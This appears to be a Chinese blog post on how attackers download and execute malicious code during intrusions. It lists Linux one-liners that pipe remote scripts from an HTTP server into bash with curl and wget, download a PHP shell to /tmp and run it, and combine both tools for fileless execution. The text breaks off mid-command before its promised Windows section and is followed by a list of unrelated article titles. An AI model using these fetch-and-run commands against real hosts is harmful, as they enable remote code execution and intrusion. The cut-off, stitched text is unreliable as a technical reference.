在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。

在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。

一、Linux 远程恶意代码执行

01、curl

以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。

方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash方式2:bash < <( curl http://192.168.99.19:8080/test.sh  )

02、wget

执行wget命令远程下载恶意程序。

方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash方式2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php

curl+wget合并,实现无文件远程恶意代码执行。

bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||wget -q -O- http

通过命令下载执行恶意代码的几种姿势相关推荐

  1. VMware Mac版本漏洞可任意执行恶意代码

    日前安全研究人员发现了一个存在于虚拟化软件VMware Mac版本Fusion中的严重安全漏洞,该漏洞可以通过Windows虚拟机在Mac主机上执行恶意代码,VMware已经发布了Fusion 2.0 ...

  2. Spring中Bean创建完成后执行指定代码的几种实现方式

    Spring中Bean创建完成后执行指定代码的几种实现方式 1. 实现ApplicationListener接口 2. 实现InitializingBean接口 3. 使用@PostConstruct ...

  3. cscript 执行代码_在Windows上执行恶意代码 by cscriptmshta

    Windows自带的可执行文件+合理构造的payload脚本=获得会话 cscript 简介 在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript. WS ...

  4. 涨见识了,在终端执行 Python 代码的 6 种方式

    作者 | BRETT CANNON 译者 | 豌豆花下猫@Python猫 为了我们推出的 VS Code 的 Python 插件[1],我写了一个简单的脚本来生成变更日志[2](类似于Towncrie ...

  5. 在终端执行 Python 代码的 6 种方法,原来还能这样!

    来自 | Python猫  编译 | 豌豆花下猫 原作 | BRETT CANNON 为了我们推出的 VS Code 的 Python 插件[1],我写了一个简单的脚本来生成变更日志[2](类似于To ...

  6. python交互式方式、代码文件方式_涨见识了,在终端执行 Python 代码的 6 种方式

    原作:BRETT CANNON 译者:豌豆花下猫@Python猫 英文:https://snarky.ca/the-many-ways-to-pass-code-to-python-from-the- ...

  7. python花猫_涨见识了,在终端执行 Python 代码的 6 种方式!

    原作: BRETT CANNON 译者:豌豆花下猫@Python猫 英文: https://snarky.ca/the-many-ways-to-pass-code-to-python-from-th ...

  8. 执行python代码的方式_涨见识了,在终端执行 Python 代码的 6 种方式!

    译者:豌豆花下猫@Python猫 为了我们推出的 VS Code 的 Python 插件 [1],我写了一个简单的脚本来生成变更日志 [2](类似于Towncrier [3],但简单些,支持 Mark ...

  9. 用命令行执行java代码

最新文章

  1. 13.最为经典的动态规划入门
  2. python123程序设计题说句心里话_用c++写一个简单的计算器程序
  3. 解决CI框架的Disallowed Key Characters错误提示
  4. WCF入门(五)---创建WCF服务
  5. oracle学习笔记(十三) 查询练习(三) 子查询查询
  6. 微软提高 Microsoft 365 的漏洞奖励
  7. android surface windows,Android易混概念辨析之Surface,Window,View,SurfaceView,Bitmap
  8. ASM 转自三思笔记,改成自己看着舒服的格式而已
  9. 翻转课堂管理系统_ER图_功能图_数据字典_数据库脚本
  10. 计算机应用公式基础教学教案,《终稿[定稿]大学计算机应用基础全册教案版》...
  11. 计算机窗口的PPT,PPT幻灯片基础入门01-认识窗口界面
  12. Ubuntu与windows之间实现复制粘贴
  13. STARK Low Degree Testing——FRI
  14. Windows Server 2012 IPAM的管理
  15. android 无法后台运行,安卓模拟器无法后台?
  16. local-preference-实践理解(22/3/2)
  17. 好雨知时节 不甚欢喜
  18. Program type already present: com.google.gson.FieldAttributes
  19. 2019原创考研数学 基础过关660题 数学一
  20. flask template中使用Vue,遇到引入element-ui无效问题,Unknown custom element did you register the component correc

热门文章

  1. html点击超链接怎么打开ppt,ppt怎么查看所有超链接 设置完成后可以发现刚刚设置的超链...
  2. PMP思维导图 | 风险管理(一)
  3. mysql英雄联盟卡_《英雄联盟》LOL购物点怎麽获得?怎麽用?[图]
  4. 小红书和抖音的流量机制是什么?
  5. XUtils===XUtils3框架的基本使用方法
  6. 马小看前端(防抖和节流)
  7. 可怕的不是堕落,而是清楚自己在堕落
  8. Kubernetes基础:滚动升级回滚:rolling-update之rollback
  9. PyCharm 添加 外键的时候 报错 TypeError:__init__()missing 1 required positional argument:‘on_delete‘
  10. 一图看懂 aiohttp 模块:基于 asyncio 的异步HTTP网络库, 资料整理+笔记(大全)